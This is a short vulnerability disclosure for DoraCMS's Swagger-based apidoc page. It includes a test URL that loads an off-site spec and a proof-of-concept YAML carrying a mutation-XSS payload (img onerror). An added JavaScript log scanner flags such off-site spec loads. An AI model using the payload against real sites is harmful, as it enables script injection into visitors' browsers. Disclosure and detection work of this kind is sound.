DoraCMS uses an outdated version of Swagger to build its apidoc, which contains a known DOM-based XSS vulnerability.
You can add this parameter to the URL to test your own site:
https://[HOST]/static/apidoc/index.html?url=https://jumpy-floor.surge.sh/test.yaml

POC:
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror=alert('xss')>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
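
An added example, not part of the original report or the DoraCMS code: a log check that flags requests asking the apidoc page to load a spec from another host through the `url` parameter described above. The log lines, host names, function names and the combined access-log format are assumptions made for the illustration.

```javascript
// Added example: the path comes from the report; everything else is constructed.
const APIDOC_PATH = '/static/apidoc/index.html';

// Returns the spec URL when a request asks the apidoc page to load a spec
// from a host other than siteHost; returns null otherwise.
function externalSpecUrl(requestTarget, siteHost) {
  let req;
  try {
    req = new URL(requestTarget, `https://${siteHost}`);
  } catch {
    return null;
  }
  if (req.pathname.toLowerCase() !== APIDOC_PATH) return null;
  const spec = req.searchParams.get('url'); // percent-decoding happens here
  if (!spec) return null;
  try {
    // Resolve relative and protocol-relative values as a browser would.
    const target = new URL(spec, req);
    return target.host === req.host ? null : target.href;
  } catch {
    return spec; // unparseable value: keep it for manual review
  }
}

// Scans access-log lines (combined log format assumed) and returns the hits.
function findExternalSpecLoads(logLines, siteHost) {
  const hits = [];
  for (const line of logLines) {
    const m = /"(?:GET|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    const spec = externalSpecUrl(m[1], siteHost);
    if (spec) hits.push({ client: line.split(' ', 1)[0], spec });
  }
  return hits;
}

// Constructed sample log lines (documentation IP ranges and example hosts).
const SAMPLE_LOG = [
  '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /static/apidoc/index.html HTTP/1.1" 200 1432',
  '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /static/apidoc/index.html?url=swagger.yaml HTTP/1.1" 200 1432',
  '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /static/apidoc/index.html?url=https://specs.example.net/test.yaml HTTP/1.1" 200 1432',
  '203.0.113.9 - - [01/Jan/2024:10:01:09 +0000] "GET /static/apidoc/index.html?url=https%3A%2F%2Fspecs.example.net%2Ftest.yaml HTTP/1.1" 200 1432',
  '203.0.113.9 - - [01/Jan/2024:10:01:20 +0000] "GET /static/apidoc/index.html?url=//specs.example.net/test.yaml HTTP/1.1" 200 1432',
];

console.log(findExternalSpecLoads(SAMPLE_LOG, 'cms.example.test'));
```

A hit only shows that a visitor was sent a link carrying an off-site spec; the fix remains upgrading the bundled Swagger build.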